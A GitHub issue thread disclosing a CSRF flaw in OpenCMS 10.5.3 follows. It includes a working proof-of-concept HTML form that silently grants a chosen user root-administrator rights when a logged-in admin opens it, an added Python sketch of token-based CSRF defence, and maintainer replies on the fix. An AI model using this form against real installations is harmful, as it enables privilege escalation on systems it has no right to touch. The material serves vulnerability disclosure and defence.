Cross Site Request Forgery Vulnerability in OpenCMS 10.5.3 #586

Closed
MrR3boot opened this issue Mar 20, 2018 · 8 comments

@MrR3boot

Hi Team, I would like to report multiple CSRF vulnerabilities in the latest version. mitre.org assigned a new CVE for this vulnerability.

Description:

Cross-site request forgery (CSRF) vulnerability in opencms/system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation.

Steps to Reproduce:

  1. Send the crafted request below to a logged-in user who has Root Administrator level access.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.146.131:8080/opencms/system/workplace/admin/accounts/user_role.jsp" method="POST">
      <input type="hidden" name="dialogtype" value="" />
      <input type="hidden" name="root" value="" />
      <input type="hidden" name="sortcol" value="" />
      <input type="hidden" name="preactiondone" value="" />
      <input type="hidden" name="oufqn" value="" />
      <input type="hidden" name="resource" value="" />
      <input type="hidden" name="userid" value="replace with actual user id of low privileged user." />
      <input type="hidden" name="closelink" value="&#37;2Fopencms&#37;2Fsystem&#37;2Fworkplace&#37;2Fviews&#37;2Fadmin&#37;2Fadmin&#45;main&#46;jsp&#37;3Fpath&#37;3D&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;26action&#37;3Dinitial" />
      <input type="hidden" name="framename" value="" />
      <input type="hidden" name="ispopup" value="" />
      <input type="hidden" name="originalparams" value="" />
      <input type="hidden" name="message" value="" />
      <input type="hidden" name="selitems" value="RoleRootAdmins" />
      <input type="hidden" name="title" value="" />
      <input type="hidden" name="style" value="new" />
      <input type="hidden" name="page" value="" />
      <input type="hidden" name="base" value="" />
      <input type="hidden" name="path" value="&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;2Fedit&#37;2Frole" />
      <input type="hidden" name="action" value="listmultiaction" />
      <input type="hidden" name="searchfilter" value="" />
      <input type="hidden" name="redirect" value="" />
      <input type="hidden" name="force" value="" />
      <input type="hidden" name="formname" value="lsre&#45;form" />
      <input type="hidden" name="listaction" value="ma" />
      <input type="hidden" name="listMultiAction" value="RoleRootAdmins" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  2. Once the logged-in user opens the URL, the form is submitted with the active session of the root administrator and the action is performed successfully.

Fix:

Implementing a random token in every state-changing request will mitigate the issue.

Affected Version:

10.5.3 release
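
A minimal sketch of the per-session random token proposed under "Fix", added here as an illustration; it is not part of the original report and is not OpenCms code. The field name `csrf_token`, the dict-based session and the placeholder `userid` are assumptions; the other request fields are taken from the form above.

```python
import hmac
import secrets

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}  # must never change state
TOKEN_FIELD = "csrf_token"                 # hypothetical hidden-field name


def issue_token(session: dict) -> str:
    """Create (once per session) the random token the server embeds in each form it renders."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def is_request_allowed(method: str, params: dict, session: dict) -> bool:
    """Return True only if a state-changing request carries this session's token."""
    if method.upper() in SAFE_METHODS:
        return True
    expected = session.get(TOKEN_FIELD)
    supplied = params.get(TOKEN_FIELD)
    if not expected or not isinstance(supplied, str):
        return False
    # Constant-time comparison so the check does not leak token prefixes.
    return hmac.compare_digest(expected.encode(), supplied.encode())


# Constructed sample data: the role-change fields from the report's form.
ROLE_CHANGE = {
    "userid": "00000000-0000-0000-0000-000000000000",  # placeholder id
    "action": "listmultiaction",
    "listaction": "ma",
    "listMultiAction": "RoleRootAdmins",
    "selitems": "RoleRootAdmins",
}


def demo() -> dict:
    admin_session = {}                          # root administrator's server-side session
    token = issue_token(admin_session)          # rendered into the genuine workplace form
    foreign_token = issue_token({})             # token belonging to some other session
    post = lambda extra, sess: is_request_allowed("POST", {**ROLE_CHANGE, **extra}, sess)
    return {
        "genuine_form": post({TOKEN_FIELD: token}, admin_session),
        "cross_site_form": post({}, admin_session),  # cookie is sent, token is not
        "foreign_token": post({TOKEN_FIELD: foreign_token}, admin_session),
        "no_session_token": post({TOKEN_FIELD: ""}, {}),
        "read_only_get": is_request_allowed("GET", {}, admin_session),
    }


if __name__ == "__main__":
    for case, allowed in demo().items():
        print(f"{case:17} -> {'accepted' if allowed else 'rejected (403)'}")
```

The cross-site form is rejected because the browser attaches the session cookie automatically but the submitting page cannot read the token stored in the administrator's session.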

@MrR3boot
Author

Any update on the reported issue?

@tHerrmann

Hi, we are looking into this and will fix the issue with our next maintenance release.

@MrR3boot
Author

Thanks for the response. I will wait for the updated release. Kindly mention my details in the new release.

Name : Sureshbabu Narvaneni
Mail : narvaneni.suresh@gmail.com

@MrR3boot
Author

Hi, can I get an exact ETA for this fix?

@veggie4ever

Hi Team,
any update on this issue?
Best regards
Kai

@veggie4ever

Hi @tHerrmann,
any news on this? The issue is more than two years old. Is this fixed in version 11.x?
Best regards
Kai

@tHerrmann

Hi Kai,
the mentioned JSP is no longer present in OpenCms since 11.0.0. So this should be resolved.
@gWestenberger, would you like to close this issue?

@etruta

etruta commented May 26, 2021
